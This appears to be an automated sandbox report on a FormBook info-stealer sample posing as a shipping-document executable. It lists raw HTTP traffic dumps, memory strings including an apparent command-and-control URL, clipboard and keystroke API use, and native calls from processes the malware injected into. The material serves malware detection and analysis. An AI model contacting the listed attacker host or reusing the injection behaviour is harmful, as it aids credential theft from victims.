31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 08:12:38 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 08:12:41 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.0000000005692000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000004E42000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: oFlOzErifOVgUf.exe, 00000005.00000002.3520891709.0000000001374000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ontherise.top
                Source: oFlOzErifOVgUf.exe, 00000005.00000002.3520891709.0000000001374000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ontherise.top/wr6c/
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.0000000004B94000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3522886189.0000000006900000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000004344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C874000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: tzutil.exe, 00000006.00000002.3520285479.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: tzutil.exe, 00000006.00000002.3520285479.00000000032C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: tzutil.exe, 00000006.00000002.3520285479.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: tzutil.exe, 00000006.00000002.3520285479.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: tzutil.exe, 00000006.00000002.3520285479.00000000032C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: tzutil.exe, 00000006.00000003.2402042935.0000000008325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009A4164
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009A4164
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009A3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009A3F66
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0099001C
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009BCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_009BCABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3520903347.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221199653.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3520852127.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: This is a third-party compiled AutoIt script.0_2_00933B3A
                Source: DRAFT COPY BL, CI & PL.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: DRAFT COPY BL, CI & PL.exe, 00000000.00000000.1667352112.00000000009E4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5045fea0-4
                Source: DRAFT COPY BL, CI & PL.exe, 00000000.00000000.1667352112.00000000009E4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d937f087-a
                Source: DRAFT COPY BL, CI & PL.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_902d9ace-8
                Source: DRAFT COPY BL, CI & PL.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9a95b495-6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C9E3 NtClose,1_2_0042C9E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B60 NtClose,LdrInitializeThunk,1_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk,1_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74340 NtSetContextThread,1_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74650 NtSuspendThread,1_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BE0 NtQueryValueKey,1_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BF0 NtAllocateVirtualMemory,1_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B80 NtQueryInformationFile,1_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BA0 NtEnumerateValueKey,1_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AD0 NtReadFile,1_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AF0 NtWriteFile,1_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AB0 NtWaitForSingleObject,1_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FE0 NtCreateFile,1_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F90 NtProtectVirtualMemory,1_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FA0 NtQuerySection,1_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FB0 NtResumeThread,1_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F60 NtCreateProcessEx,1_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F30 NtCreateSection,1_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EE0 NtQueueApcThread,1_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E80 NtReadVirtualMemory,1_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EA0 NtAdjustPrivilegesToken,1_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E30 NtWriteVirtualMemory,1_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DD0 NtDelayExecution,1_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DB0 NtEnumerateKey,1_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D00 NtSetInformationFile,1_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D10 NtMapViewOfSection,1_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D30 NtUnmapViewOfSection,1_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CC0 NtQueryVirtualMemory,1_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CF0 NtOpenProcess,1_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CA0 NtQueryInformationToken,1_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C60 NtCreateKey,1_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C70 NtFreeVirtualMemory,1_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C00 NtQueryInformationProcess,1_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73090 NtSetValueKey,1_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73010 NtOpenDirectoryObject,1_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C739B0 NtGetContextThread,1_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D70 NtOpenThread,1_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D10 NtOpenProcessToken,1_2_03C73D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A4340 NtSetContextThread,LdrInitializeThunk,6_2_039A4340
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A4650 NtSuspendThread,LdrInitializeThunk,6_2_039A4650
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_039A2BA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_039A2BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_039A2BE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2B60 NtClose,LdrInitializeThunk,6_2_039A2B60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2AD0 NtReadFile,LdrInitializeThunk,6_2_039A2AD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2AF0 NtWriteFile,LdrInitializeThunk,6_2_039A2AF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2FB0 NtResumeThread,LdrInitializeThunk,6_2_039A2FB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2FE0 NtCreateFile,LdrInitializeThunk,6_2_039A2FE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2F30 NtCreateSection,LdrInitializeThunk,6_2_039A2F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_039A2E80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_039A2EE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2DD0 NtDelayExecution,LdrInitializeThunk,6_2_039A2DD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_039A2DF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_039A2D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_039A2D30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_039A2CA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_039A2C70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2C60 NtCreateKey,LdrInitializeThunk,6_2_039A2C60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A35C0 NtCreateMutant,LdrInitializeThunk,6_2_039A35C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A39B0 NtGetContextThread,LdrInitializeThunk,6_2_039A39B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2B80 NtQueryInformationFile,6_2_039A2B80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2AB0 NtWaitForSingleObject,6_2_039A2AB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2F90 NtProtectVirtualMemory,6_2_039A2F90
